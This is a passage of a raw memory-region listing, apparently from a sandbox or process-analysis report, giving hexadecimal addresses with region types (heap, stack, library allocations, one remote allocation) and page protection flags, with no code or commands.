page read and write
516B3FB000
stack
page read and write
2B69A702000
trusted library allocation
page read and write
1D985573000
heap
page read and write
1D277CD3000
heap
page read and write
7FFD9B5D6000
trusted library allocation
page read and write
1285000
heap
page read and write
2B69B259000
trusted library allocation
page read and write
1E6F6F6A000
heap
page read and write
1DE3CED0000
heap
page read and write
7FFD9B720000
trusted library allocation
page read and write
2F50000
trusted library allocation
page read and write
7FFD9B5E0000
trusted library allocation
page execute and read and write
1628CD60000
heap
page read and write
553F000
stack
page read and write
597E000
stack
page read and write
1DE3D37D000
trusted library allocation
page read and write
7FFD9B520000
trusted library allocation
page read and write
1628D4F6000
trusted library allocation
page read and write
209210CB000
heap
page read and write
1D987589000
trusted library allocation
page read and write
1628D0F9000
trusted library allocation
page read and write
177D8D39000
trusted library allocation
page read and write
1E6F71A6000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
20ECC04F000
heap
page read and write
7FFD9B894000
trusted library allocation
page read and write
12B4000
trusted library allocation
page read and write
1E6F4F1E000
heap
page read and write
1A061FE000
stack
page read and write
542E000
stack
page read and write
1D279BFD000
heap
page read and write
15583EB0000
heap
page read and write
177D7038000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
53E0000
heap
page execute and read and write
5700000
heap
page execute and read and write
D5B000
stack
page read and write
1D333255000
trusted library allocation
page read and write
1DE3B260000
heap
page read and write
1DE3B3C8000
heap
page read and write
20EE63A3000
heap
page read and write
1709A7B0000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
1628B366000
heap
page read and write
7FFD9B730000
trusted library allocation
page execute and read and write
15C86330000
heap
page read and write
1D279BB0000
heap
page read and write
25F803BA000
trusted library allocation
page read and write
11E6000
heap
page read and write
25F80396000
trusted library allocation
page read and write
7FFD9B6D0000
trusted library allocation
page execute and read and write
AFFE7F8000
stack
page read and write
7FFD9B702000
trusted library allocation
page read and write
587E000
stack
page read and write
12B0000
trusted library allocation
page read and write
1709AA8B000
trusted library allocation
page read and write
2B6AA7D8000
trusted library allocation
page read and write
1E680488000
trusted library allocation
page read and write
15C866E4000
heap
page read and write
3EE49F8000
stack
page read and write
2B69B45E000
trusted library allocation
page read and write
3061000
trusted library allocation
page read and write
2B6B282C000
heap
page read and write
598E000
stack
page read and write
1D34ACE0000
heap
page read and write
1E6F68C0000
trusted library allocation
page read and write
20922E23000
trusted library allocation
page read and write
177D7070000
heap
page read and write
1DE3D6C8000
trusted library allocation
page read and write
2B6986F0000
heap
page read and write
182A8FE4000
heap
page read and write
2BA0FF000
stack
page read and write
1D330C7B000
heap
page read and write
56E0000
heap
page execute and read and write
177DA57E000
trusted library allocation
page read and write
177DA5C3000
trusted library allocation
page read and write
7FFD9B606000
trusted library allocation
page execute and read and write
15584245000
heap
page read and write
5D4C73D000
stack
page read and write
CCF1EF9000
stack
page read and write
2B69BD4F000
trusted library allocation
page read and write
20ECE409000
trusted library allocation
page read and write
9FB0A7D000
stack
page read and write
2E7CFBF000
stack
page read and write
2B69BD75000
trusted library allocation
page read and write
CCFA47B000
stack
page read and write
1709AA85000
trusted library allocation
page read and write
E8BD08D000
stack
page read and write
1628D0FF000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
24FE2520000
heap
page read and write
3EE46FF000
stack
page read and write
1E6F4DB0000
heap
page read and write
1380000
trusted library allocation
page read and write
177D9144000
trusted library allocation
page read and write
E8BC33A000
stack
page read and write
177D9BF6000
trusted library allocation
page read and write
7FFD9B6B2000
trusted library allocation
page read and write
1D9854C0000
trusted library allocation
page read and write
7FFD9B630000
trusted library allocation
page execute and read and write
15585FE2000
trusted library allocation
page read and write
80C76FF000
stack
page read and write
584E000
stack
page read and write
7FFD9B6DA000
trusted library allocation
page read and write
13F2000
heap
page read and write
1D277CBC000
heap
page read and write
7FFD9B710000
trusted library allocation
page read and write
155860C5000
trusted library allocation
page read and write
7FFD9B6E0000
trusted library allocation
page read and write
220D1274000
heap
page read and write
182AAE12000
trusted library allocation
page read and write
24FE37D6000
trusted library allocation
page read and write
7FFD9B728000
trusted library allocation
page read and write
5CFE000
stack
page read and write
9FB1A4E000
stack
page read and write
1D986F16000
heap
page execute and read and write
7FFD9B5E0000
trusted library allocation
page execute and read and write
20ECE79C000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
1D330B20000
heap
page read and write
1A6A90E1000
heap
page read and write
220D10B0000
heap
page read and write
155840B1000
heap
page read and write
2B69B46F000
trusted library allocation
page read and write
8C8927B000
stack
page read and write
FCB000
stack
page read and write
9FB0DFE000
stack
page read and write
63D4DF9000
stack
page read and write
1DE3B310000
heap
page read and write
7FFD9B5CC000
trusted library allocation
page execute and read and write
2E7CEBE000
stack
page read and write
20ECC1A4000
heap
page read and write
1DE3D32C000
trusted library allocation
page read and write
1709AA51000
trusted library allocation
page read and write
1D333232000
trusted library allocation
page read and write
1DE3CD80000
heap
page execute and read and write
1D330E60000
heap
page read and write
1E6F4F64000
heap
page read and write
1E68057F000
trusted library allocation
page read and write
177D72A0000
trusted library allocation
page read and write
1E6F4F50000
heap
page read and write
7FFD9B6B2000
trusted library allocation
page read and write
12C0000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
1D33321E000
trusted library allocation
page read and write
1DE3CD60000
trusted library allocation
page read and write
2BA4F8000
stack
page read and write
1DE3D376000
trusted library allocation
page read and write
7FFD9B5F6000
trusted library allocation
page read and write
24FF281B000
trusted library allocation
page read and write
20922E13000
trusted library allocation
page read and write
2BB28E000
stack
page read and write
1E68005E000
trusted library allocation
page read and write
7FFD9B6F8000
trusted library allocation
page read and write
24FF2822000
trusted library allocation
page read and write
63D47D2000
stack
page read and write
1D279C0D000
heap
page read and write
9FB0AFF000
stack
page read and write
1D330C77000
heap
page read and write
2B6B2ABA000
heap
page read and write
20922E5C000
trusted library allocation
page read and write
E8BC17D000
stack
page read and write
2B6AA501000
trusted library allocation
page read and write
7FFD9B5D0000
trusted library allocation
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
1E690075000
trusted library allocation
page read and write
7FFD9B850000
trusted library allocation
page read and write
1D33355A000
trusted library allocation
page read and write
2092321A000
trusted library allocation
page read and write
20EE61E0000
trusted library section
page read and write
7FFD9B550000
trusted library allocation
page read and write
AFFE4FF000
stack
page read and write
1E6F71DA000
heap
page read and write
1D332CD0000
heap
page read and write
244E1460000
heap
page read and write
1DE55416000
heap
page read and write
80C77FE000
stack
page read and write
1628B240000
heap
page read and write
177D706A000
heap
page read and write
1D279ABE000
heap
page read and write
7FFD9B6C1000
trusted library allocation
page read and write
177DA480000
trusted library allocation
page read and write
7FFD9B710000
trusted library allocation
page execute and read and write
1E6F7196000
heap
page execute and read and write
1D3332AB000
trusted library allocation
page read and write
E8BD28E000
stack
page read and write
516E000
stack
page read and write
7FFD9B750000
trusted library allocation
page read and write
5D4C6B8000
stack
page read and write
2B6B29B0000
heap
page read and write
1E6F68D0000
heap
page read and write
1D279AB0000
heap
page read and write
14D2000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
25F8010C000
trusted library allocation
page read and write
1E6F4EE4000
heap
page read and write
4750F7F000
stack
page read and write
9FB0B7E000
stack
page read and write
3EE4CBE000
stack
page read and write
7FFD9B6CA000
trusted library allocation
page read and write
1D33325D000
trusted library allocation
page read and write
24FE35C2000
trusted library allocation
page read and write
220EB170000
heap
page read and write
2B6988A8000
heap
page read and write
25F8010F000
trusted library allocation
page read and write
1D985790000
trusted library allocation
page read and write
20EE6069000
heap
page read and write
2DE0000
heap
page read and write
7FFD9B840000
trusted library allocation
page read and write
516AF7E000
stack
page read and write
7FFD9B878000
trusted library allocation
page read and write
516B37E000
stack
page read and write
7FFD9B6C1000
trusted library allocation
page read and write
1D333246000
trusted library allocation
page read and write
7FFD9B5DC000
trusted library allocation
page execute and read and write
20922D11000
trusted library allocation
page read and write
63D4E3E000
stack
page read and write
20ECE3CF000
trusted library allocation
page read and write
17098DFB000
heap
page read and write
24FFADAF000
heap
page read and write
7FFD9B6E1000
trusted library allocation
page read and write
1E6F4E98000
heap
page read and write
20923209000
trusted library allocation
page read and write
63D50BE000
stack
page read and write
80C7FFB000
stack
page read and write
8C895FE000
stack
page read and write
1D333568000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
20ECDF7D000
trusted library allocation
page read and write
1E6F6915000
heap
page read and write
9FB06B2000
stack
page read and write
AFFE77E000
stack
page read and write
3EE497E000
stack
page read and write
2F00000
heap
page execute and read and write
2F2E000
stack
page read and write
1709AB41000
trusted library allocation
page read and write
24FE3707000
trusted library allocation
page read and write
25F804EB000
trusted library allocation
page read and write
7FFD9B514000
trusted library allocation
page read and write
9FB07BE000
stack
page read and write
1D333285000
trusted library allocation
page read and write
147E000
stack
page read and write
2B698868000
heap
page read and write
1A064F7000
stack
page read and write
56EE000
stack
page read and write
1D279B35000
heap
page read and write
E8BC2B7000
stack
page read and write
1DE55687000
heap
page read and write
1559E3DC000
heap
page read and write
182A8DFE000
heap
page read and write
1D3332B5000
trusted library allocation
page read and write
1A0627D000
stack
page read and write
13C0000
heap
page read and write
1D330EC5000
heap
page read and write
2DC0000
trusted library allocation
page read and write
7FFD9B6C2000
trusted library allocation
page read and write
220D3171000
trusted library allocation
page read and write
CCF1BFE000
stack
page read and write
1320000
trusted library allocation
page execute and read and write
15585DF0000
heap
page readonly
1628B322000
heap
page read and write
1628CCF0000
trusted library allocation
page read and write
24FE32A9000
trusted library allocation
page read and write
540E000
stack
page read and write
2E7D0BE000
stack
page read and write
2E7CBFE000
stack
page read and write
7FFD9B740000
trusted library allocation
page read and write
7FFD9B760000
trusted library allocation
page read and write
20EE638C000
heap
page read and write
7FFD9B5CC000
trusted library allocation
page execute and read and write
177D91EF000
trusted library allocation
page read and write
7FFD9B5D6000
trusted library allocation
page read and write
7FFD9B8A0000
trusted library allocation
page read and write
7FFD9B534000
trusted library allocation
page read and write
2B69B262000
trusted library allocation
page read and write
20922D59000
trusted library allocation
page read and write
24FFAAC6000
heap
page read and write
1D3327A0000
heap
page execute and read and write
17098DCE000
heap
page read and write
47512F8000
stack
page read and write
24FFAE6F000
heap
page read and write
1D9870DA000
trusted library allocation
page read and write
2B6989B0000
trusted library allocation
page read and write
7FFD9B5FC000
trusted library allocation
page execute and read and write
CCFA83E000
stack
page read and write
182A8E1E000
heap
page read and write
15586026000
trusted library allocation
page read and write
1D333289000
trusted library allocation
page read and write
121B000
heap
page read and write
1709A8B0000
heap
page read and write
24FE0B2D000
heap
page read and write
15586824000
trusted library allocation
page read and write
1D333222000
trusted library allocation
page read and write
1DE3B565000
heap
page read and write
1D279BFD000
heap
page read and write
1E6F691A000
heap
page read and write
2B6988A6000
heap
page read and write
182A8FE0000
heap
page read and write
7FFD9B522000
trusted library allocation
page read and write
24FE0C20000
heap
page read and write
1D332E02000
trusted library allocation
page read and write
20922E19000
trusted library allocation
page read and write
8C88D05000
stack
page read and write
2EA0000
trusted library allocation
page read and write
2BA1FE000
stack
page read and write
1D279AF1000
heap
page read and write
20922D88000
trusted library allocation
page read and write
7FFD9B850000
trusted library allocation
page read and write
5D4C93B000
stack
page read and write
20ECE457000
trusted library allocation
page read and write
1D279B41000
heap
page read and write
7FFD9B7E0000
trusted library allocation
page read and write
1460000
heap
page read and write
1DE55606000
heap
page execute and read and write
1628D5AE000
trusted library allocation
page read and write
1D9875DD000
trusted library allocation
page read and write
1D279AF1000
heap
page read and write
63D4A7E000
stack
page read and write
5D4C8BE000
stack
page read and write
20ECBF98000
heap
page read and write
1E6F4F54000
heap
page read and write
20ECBF90000
heap
page read and write
2B69B473000
trusted library allocation
page read and write
1D330E70000
trusted library allocation
page read and write
11F0000
heap
page read and write
2E7CC7E000
stack
page read and write
220D10C0000
heap
page read and write
24FE0A8F000
heap
page read and write
1709AABB000
trusted library allocation
page read and write
1300000
heap
page read and write
20ECE032000
trusted library allocation
page read and write
2BA3FF000
stack
page read and write
1628B264000
heap
page read and write
53CE000
stack
page read and write
1D333299000
trusted library allocation
page read and write
2B6B2E30000
heap
page read and write
580E000
stack
page read and write
20ECC1A0000
heap
page read and write
1709AEED000
trusted library allocation
page read and write
7FFD9B523000
trusted library allocation
page execute and read and write
9FB0EFE000
stack
page read and write
209210BB000
heap
page read and write
1D277CB0000
heap
page read and write
1709AF2F000
trusted library allocation
page read and write
5A8E000
stack
page read and write
177DA4A2000
trusted library allocation
page read and write
7FFD9B52D000
trusted library allocation
page execute and read and write
209230F8000
trusted library allocation
page read and write
177D7076000
heap
page read and write
AFFE97E000
stack
page read and write
63D4AFF000
stack
page read and write
513E000
stack
page read and write
1559E39E000
heap
page read and write
7FFD9B530000
trusted library allocation
page read and write
20ECE02F000
trusted library allocation
page read and write
220E3180000
trusted library allocation
page read and write
8C894FE000
stack
page read and write
1DE55610000
heap
page read and write
CCF1AFE000
stack
page read and write
7FFD9B840000
trusted library allocation
page read and write
5D4C3FE000
stack
page read and write
2B6987D0000
heap
page read and write
20921080000
heap
page read and write
1D279ACE000
heap
page read and write
15C866E0000
heap
page read and write
155860B5000
trusted library allocation
page read and write
1D332DEE000
trusted library allocation
page read and write
1D279B41000
heap
page read and write
55BE000
stack
page read and write
177DA599000
trusted library allocation
page read and write
155840CF000
heap
page read and write
7FFD9B890000
trusted library allocation
page read and write
182AAC90000
heap
page read and write
220D11CC000
heap
page read and write
1D277CD7000
heap
page read and write
7FFD9B730000
trusted library allocation
page read and write
3EE487E000
stack
page read and write
7FFD9B544000
trusted library allocation
page read and write
1628D6EA000
trusted library allocation
page read and write
20921280000
heap
page readonly
1DE3B2A0000
heap
page read and write
24FFA980000
trusted library allocation
page read and write
1D277C5F000
heap
page read and write
3EE4C3E000
stack
page read and write
1D33328D000
trusted library allocation
page read and write
24FFAE76000
heap
page read and write
1709AA71000
trusted library allocation
page read and write
594E000
stack
page read and write
DD0000
heap
page read and write
569E000
stack
page read and write
15E4000
trusted library allocation
page read and write
220D4DB2000
trusted library allocation
page read and write
2F41000
trusted library allocation
page read and write
177DA553000
trusted library allocation
page read and write
1D277BE8000
heap
page read and write
177D7200000
heap
page read and write
2B69AF32000
trusted library allocation
page read and write
1A06479000
stack
page read and write
CCF9FEF000
stack
page read and write
CCFA57E000
stack
page read and write
57FE000
stack
page read and write
220D13D3000
trusted library allocation
page read and write
1709AB4A000
trusted library allocation
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
1D279B35000
heap
page read and write
2092324E000
trusted library allocation
page read and write
56F0000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
24FFAB98000
heap
page read and write
1D279AB6000
heap
page read and write
1628D144000
trusted library allocation
page read and write
2E7C75F000
stack
page read and write
7FFD9B910000
trusted library allocation
page read and write
7FFD9B730000
trusted library allocation
page read and write
2F0E000
stack
page read and write
1628D04E000
trusted library allocation
page read and write
2BA6FE000
stack
page read and write
1D9871EF000
trusted library allocation
page read and write
1DE3D29B000
trusted library allocation
page read and write
2BA37B000
stack
page read and write
516AEFB000
stack
page read and write
1628D06B000
trusted library allocation
page read and write
24FFAB11000
heap
page read and write
1628D069000
trusted library allocation
page read and write
9FB0BFE000
stack
page read and write
1DE3D723000
trusted library allocation
page read and write
7FFD9B7F0000
trusted library allocation
page read and write
20ECDA20000
trusted library allocation
page read and write
24FE0A76000
heap
page read and write
20ECDF10000
heap
page read and write
1A0637E000
stack
page read and write
177DA4C7000
trusted library allocation
page read and write
2EB7000
trusted library allocation
page execute and read and write
15584140000
heap
page read and write
7FFD9B512000
trusted library allocation
page read and write
1628D0F5000
trusted library allocation
page read and write
1D279AE6000
heap
page read and write
7FFD9B776000
trusted library allocation
page read and write
8C8A18E000
stack
page read and write
1DE3CEA0000
heap
page execute and read and write
8C8967E000
stack
page read and write
1DE5561F000
heap
page read and write
177DA4F8000
trusted library allocation
page read and write
1709A820000
heap
page readonly
7FFD9B990000
trusted library allocation
page read and write
177DA49E000
trusted library allocation
page read and write
7FFD9B5EC000
trusted library allocation
page execute and read and write
1DE3DACB000
trusted library allocation
page read and write
138A000
trusted library allocation
page execute and read and write
1DE3B480000
heap
page read and write
15596023000
trusted library allocation
page read and write
AFFEB7B000
stack
page read and write
1D279B3E000
heap
page read and write
56C0000
trusted library allocation
page execute and read and write
1628D00B000
trusted library allocation
page read and write
3EE4D3E000
stack
page read and write
CCF1F7E000
stack
page read and write
20ECE419000
trusted library allocation
page read and write
1628CF60000
heap
page execute and read and write
2EAA000
trusted library allocation
page execute and read and write
7FFD9B790000
trusted library allocation
page read and write
1E6F4E10000
heap
page read and write
2B69B449000
trusted library allocation
page read and write
7FFD9B800000
trusted library allocation
page read and write
1210000
heap
page read and write
24FE3E81000
trusted library allocation
page read and write
220D2E24000
heap
page read and write
2F21000
trusted library allocation
page read and write
220D42E0000
trusted library allocation
page read and write
1D279AB4000
heap
page read and write
220D1494000
heap
page read and write
1E6803B9000
trusted library allocation
page read and write
1DE3B3C4000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
1229000
heap
page read and write
2BB30D000
stack
page read and write
7FFD9B5F6000
trusted library allocation
page execute and read and write
7DF4F60A0000
trusted library allocation
page execute and read and write
1A6A90E1000
heap
page read and write
2E7C6D2000
stack
page read and write
155840A9000
heap
page read and write
475107D000
stack
page read and write
1DE3DABB000
trusted library allocation
page read and write
63D4FBE000
stack
page read and write
1D277BC0000
heap
page read and write
1D330CBD000
heap
page read and write
2B6988AE000
heap
page read and write
20932D20000
trusted library allocation
page read and write
557E000
stack
page read and write
14CD000
heap
page read and write
7FFD9B640000
trusted library allocation
page execute and read and write
2B698A90000
heap
page read and write
1D277CD3000
heap
page read and write
2B6B2987000
heap
page execute and read and write
2B69B44D000
trusted library allocation
page read and write
24FF2561000
trusted library allocation
page read and write
20EE6386000
heap
page read and write
1D33318B000
trusted library allocation
page read and write
E8BC07E000
stack
page read and write
20ECC090000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
20921169000
heap
page read and write
400000
remote allocation
page execute and read and write
2B6AA52C000
trusted library allocation
page read and write
20922D00000
heap
page read and write
5D4C27F000
stack
page read and write
1709AB44000
trusted library allocation
page read and write
516AE7E000
stack
page read and write
1E6F71F8000
heap
page read and write
1D277CC4000
heap
page read and write
8A24B73000
stack
page read and write
5D4C37D000
stack
page read and write
E8BC53C000
stack
page read and write
20ECC1B0000
heap
page read and write
2E7DBCD000
stack
page read and write
1DE3D746000
trusted library allocation
page read and write
1709A9F0000
heap
page execute and read and write
1E6803BE000
trusted library allocation
page read and write
AFFE6FE000
stack
page read and write
1D279C21000
heap
page read and write
11DD000
heap
page read and write
CCF1A7F000
stack
page read and write
123D000
heap
page read and write
7FFD9B930000
trusted library allocation
page read and write
15586390000
trusted library allocation
page read and write
1E680899000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
9FB107B000
stack
page read and write
1D33323E000
trusted library allocation
page read and write
209213D4000
heap
page read and write
AFFE67E000
stack
page read and write
182A90B7000
heap
page execute and read and write
1D33326F000
trusted library allocation
page read and write
516B0F7000
stack
page read and write
1D98754F000
trusted library allocation
page read and write
2B6988E7000
heap
page read and write
24FFAE55000
heap
page read and write
1D277BE0000
heap
page read and write
1559E3A7000
heap
page read and write
1D330CC0000
heap
page read and write
20ECC02F000
heap
page read and write
1D332DF7000
trusted library allocation
page read and write
1D277CBD000
heap
page read and write
1D279B39000
heap
page read and write
1709B4E4000
trusted library allocation
page read and write
1A063FE000
stack
page read and write
1D277CA7000
heap
page read and write
1628D075000
trusted library allocation
page read and write
25F8005D000
trusted library allocation
page read and write
2BA072000
stack
page read and write
182A90D0000
heap
page read and write
24FFAF20000
trusted library allocation
page read and write
7FFD9B740000
trusted library allocation
page read and write
182AB9C2000
trusted library allocation
page read and write
1D330CBB000
heap
page read and write
20921040000
heap
page read and write
1DE4D2A2000
trusted library allocation
page read and write
13B0000
trusted library allocation
page read and write
AFFE47F000
stack
page read and write
8A25F8E000
stack
page read and write
220D3DA2000
trusted library allocation
page read and write
220D11BE000
heap
page read and write
E8BD00E000
stack
page read and write
1E6F6FD1000
heap
page read and write
15E0000
trusted library allocation
page read and write
20EE6230000
heap
page read and write
5430000
heap
page read and write
2B6B286B000
heap
page read and write
182A8D70000
heap
page read and write
7FFD9B6EA000
trusted library allocation
page read and write
2E5E000
stack
page read and write
1D279AF1000
heap
page read and write
7FFD9B860000
trusted library allocation
page read and write
2B6AA7CB000
trusted library allocation
page read and write
1E6F6CF0000
heap
page read and write
177DA54F000
trusted library allocation
page read and write
7FFD9B54D000
trusted library allocation
page execute and read and write
E8BC4BE000
stack
page read and write
11E0000
heap
page read and write
1E6808AA000
trusted library allocation
page read and write
CCF1C7F000
stack
page read and write
7FFD9B606000
trusted library allocation
page execute and read and write
1D330BD8000
heap
page read and write
1D279C43000
heap
page read and write
1558684D000
trusted library allocation
page read and write
47513F8000
stack
page read and write
3077000
trusted library allocation
page read and write
1D333295000
trusted library allocation
page read and write
20922D98000
trusted library allocation
page read and write
1DE3DAB9000
trusted library allocation
page read and write
2B69B601000
trusted library allocation
page read and write
CCF179F000
stack
page read and write
155840B5000
heap
page read and write
7FFD9B860000
trusted library allocation
page read and write
516AD7F000
stack
page read and write
20EE60D2000
heap
page read and write
220D1360000
heap
page readonly
1D330B40000
heap
page read and write
15C86530000
heap
page read and write
1559E387000
heap
page execute and read and write
7FFD9B5F0000
trusted library allocation
page read and write
1E6F71A0000
heap
page read and write
20920FE0000
heap
page read and write
220D120A000
heap
page read and write
1D330C73000
heap
page read and write
7FFD9B6F4000
trusted library allocation
page read and write
24FFAB3C000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
15585FA1000
trusted library allocation
page read and write
14C0000
trusted library allocation
page read and write
20ECE7C4000
trusted library allocation
page read and write
2F30000
heap
page execute and read and write
8C8937D000
stack
page read and write
1709AB8D000
trusted library allocation
page read and write
4750FFE000
stack
page read and write
220D2E20000
heap
page read and write
177D7350000
heap
page read and write
7FFD9B5E6000
trusted library allocation
page read and write
8A2543E000
stack
page read and write
177D91CE000
trusted library allocation
page read and write
1D34AFA0000
heap
page read and write
20ECE06E000
trusted library allocation
page read and write
2B69B466000
trusted library allocation
page read and write
1709A800000
trusted library allocation
page read and write
209212B0000
heap
page execute and read and write
2B69B43D000
trusted library allocation
page read and write
2F20000
heap
page read and write
15595FA1000
trusted library allocation
page read and write
1D34AD42000
heap
page read and write
E8BC0F6000
stack
page read and write
1E6F6F32000
heap
page read and write
1D279C37000
heap
page read and write
1D277CD7000
heap
page read and write
1D277C52000
heap
page read and write
1D33324E000
trusted library allocation
page read and write
7FFD9B903000
trusted library allocation
page read and write
125E000
stack
page read and write
1628B31D000
heap
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
1E690081000
trusted library allocation
page read and write
2B69B7E5000
trusted library allocation
page read and write
24FE3740000
trusted library allocation
page read and write
1D98554B000
heap
page read and write
1DE3B240000
heap
page read and write
7FFD9B6CA000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
220D1206000
heap
page read and write
5D4D30F000
stack
page read and write
220D1350000
trusted library allocation
page read and write
244E13B0000
heap
page read and write
20EE61A0000
heap
page execute and read and write
7FFD9B980000
trusted library allocation
page read and write
2EEE000
stack
page read and write
20EDDF9F000
trusted library allocation
page read and write
CCF1FFE000
stack
page read and write
5550000
heap
page read and write
7FFD9B532000
trusted library allocation
page read and write
2B69BC6A000
trusted library allocation
page read and write
25F804FB000
trusted library allocation
page read and write
504E000
stack
page read and write
1D333275000
trusted library allocation
page read and write
177D72D0000
heap
page readonly
177D8EE7000
trusted library allocation
page read and write
24FFACD0000
heap
page execute and read and write
1628D0FC000
trusted library allocation
page read and write
1709AB3E000
trusted library allocation
page read and write
9FB07FE000
stack
page read and write
15583FF8000
heap
page read and write
7FFD9B514000
trusted library allocation
page read and write
5440000
heap
page read and write
24FE2480000
heap
page read and write
1558650C000
trusted library allocation
page read and write
7FFD9B6F1000
trusted library allocation
page read and write
209210C5000
heap
page read and write
1559E2C0000
heap
page execute and read and write
1D279ADD000
heap
page read and write
7FFD9B740000
trusted library allocation
page read and write
177D7020000
heap
page read and write
1A067FF000
stack
page read and write
7FFD9B710000
trusted library allocation
page execute and read and write
2B69B0CB000
trusted library allocation
page read and write
2F17000
trusted library allocation
page read and write
7FFD9B740000
trusted library allocation
page read and write
17098E0D000
heap
page read and write
1628B364000
heap
page read and write
24FF2541000
trusted library allocation
page read and write
1D986E80000
heap
page execute and read and write
7FFD9B7D0000
trusted library allocation
page read and write
1370000
heap
page read and write
1DE3DAC7000
trusted library allocation
page read and write
7FFD9B873000
trusted library allocation
page read and write
24FE37A3000
trusted library allocation
page read and write
1630000
trusted library allocation
page read and write
20ECDF69000
trusted library allocation
page read and write
1D277CAF000
heap
page read and write
20ECE7B3000
trusted library allocation
page read and write
17098EB0000
heap
page read and write
1D279AF1000
heap
page read and write
177D72E0000
trusted library allocation
page read and write
15585E30000
heap
page read and write
7FFD9B7D0000
trusted library allocation
page read and write
8C891FD000
stack
page read and write
24FE2F82000
trusted library allocation
page read and write
63D4BFD000
stack
page read and write
1520000
heap
page read and write
20ECE81C000
trusted library allocation
page read and write
1E6F6870000
trusted library allocation
page read and write
7FFD9B5C0000
trusted library allocation
page read and write
1E68051E000
trusted library allocation
page read and write
AFFE8FC000
stack
page read and write
80C7AFF000
stack
page read and write
CCF17DE000
stack
page read and write
1628D6D8000
trusted library allocation
page read and write
182AAF1C000
trusted library allocation
page read and write
1D34ADC6000
heap
page read and write
25F80105000
trusted library allocation
page read and write
7FFD9B6D0000
trusted library allocation
page execute and read and write
2B69A320000
heap
page execute and read and write
53CE000
stack
page read and write
7FFD9B6C0000
trusted library allocation
page read and write
12A3000
trusted library allocation
page execute and read and write
5D4C83E000
stack
page read and write
15585E00000
trusted library allocation
page read and write
1D277CD7000
heap
page read and write
4F4E000
stack
page read and write
80C7339000
stack
page read and write
2093B050000
heap
page read and write
17098DB0000
heap
page read and write
7FFD9B6D1000
trusted library allocation
page read and write
1D34AE97000
heap
page execute and read and write
7FFD9B800000
trusted library allocation
page read and write
177D7330000
heap
page execute and read and write
170244E1000
heap
page read and write
1500000
trusted library allocation
page read and write
182A8FB0000
heap
page read and write
12DB000
trusted library allocation
page execute and read and write
7FFD9B510000
trusted library allocation
page read and write
7FFD9B760000
trusted library allocation
page read and write
516B27E000
stack
page read and write
5D4C47E000
stack
page read and write
9FB0FFE000
stack
page read and write
1E68086E000
trusted library allocation
page read and write
15D3000
trusted library allocation
page execute and read and write
25F80084000
trusted library allocation
page read and write
9FB0C7E000
stack
page read and write
1D279AEA000
heap
page read and write
1628B210000
heap
page read and write
2B69A490000
trusted library allocation
page read and write
20922D31000
trusted library allocation
page read and write
5990000
heap
page execute and read and write
155860A1000
trusted library allocation
page read and write
24FE0C54000
heap
page read and write
7FFD9B840000
trusted library allocation
page read and write
1DE4D221000
trusted library allocation
page read and write
1DE3D27E000
trusted library allocation
page read and write
24FE0A20000
heap
page read and write
1DE3D231000
trusted library allocation
page read and write
1515000
heap
page read and write
1628B2D0000
trusted library allocation
page read and write
7FFD9B860000
trusted library allocation
page read and write
155840F0000
heap
page read and write
1E6F4F4C000
heap
page read and write
7FFD9B630000
trusted library allocation
page execute and read and write
20ECC031000
heap
page read and write
24FE2470000
trusted library allocation
page read and write
7FFD9B700000
trusted library allocation
page execute and read and write
7FFD9B960000
trusted library allocation
page execute and read and write
AFFEA7F000
stack
page read and write
5D4BFFF000
stack
page read and write
1E6F6FC9000
heap
page read and write
503E000
stack
page read and write
1D277ED0000
heap
page read and write
1DE3B40E000
heap
page read and write
7FFD9B5FC000
trusted library allocation
page execute and read and write
2B698AA4000
heap
page read and write
2B6987F0000
heap
page read and write
2B698A20000
trusted library allocation
page read and write
2B698AA0000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
1D279BB1000
heap
page read and write
2E7CF39000
stack
page read and write
CCF1CFE000
stack
page read and write
1D342D55000
trusted library allocation
page read and write
182AAD91000
trusted library allocation
page read and write
15C86350000
heap
page read and write
182A8E08000
heap
page read and write
182A9073000
trusted library allocation
page read and write
7FFD9B880000
trusted library allocation
page read and write
177D70B1000
heap
page read and write
2B69B6B7000
trusted library allocation
page read and write
1D279ACA000
heap
page read and write
1A6A90D8000
heap
page read and write
552E000
stack
page read and write
1D332780000
trusted library allocation
page read and write
7FFD9B513000
trusted library allocation
page execute and read and write
1628D5AC000
trusted library allocation
page read and write
1DE3CD10000
trusted library allocation
page read and write
56BF000
stack
page read and write
1558651F000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
2B69B8A0000
trusted library allocation
page read and write
2E7D13B000
stack
page read and write
2BA17F000
stack
page read and write
2B69BDD8000
trusted library allocation
page read and write
7FFD9B810000
trusted library allocation
page read and write
182AAC70000
heap
page execute and read and write
516AC7F000
stack
page read and write
20ECC03D000
heap
page read and write
1DE3D319000
trusted library allocation
page read and write
2B69C2E8000
trusted library allocation
page read and write
7FFD9B51D000
trusted library allocation
page execute and read and write
CCF1D78000
stack
page read and write
5770000
heap
page read and write
20921163000
heap
page read and write
7FFD9B56C000
trusted library allocation
page execute and read and write
1DE3CD50000
heap
page readonly
7FFD9B760000
trusted library allocation
page read and write
20EE607A000
heap
page read and write
1D33322E000
trusted library allocation
page read and write
1D279C0D000
heap
page read and write
24FE2410000
heap
page read and write
1E6F71E7000
heap
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
20ECDB24000
heap
page read and write
7FFD9B750000
trusted library allocation
page read and write
3EE47FD000
stack
page read and write
1330000
heap
page read and write
8C892FE000
stack
page read and write
24FFA9B6000
heap
page execute and read and write
7FFD9B5E0000
trusted library allocation
page read and write
20922D6D000
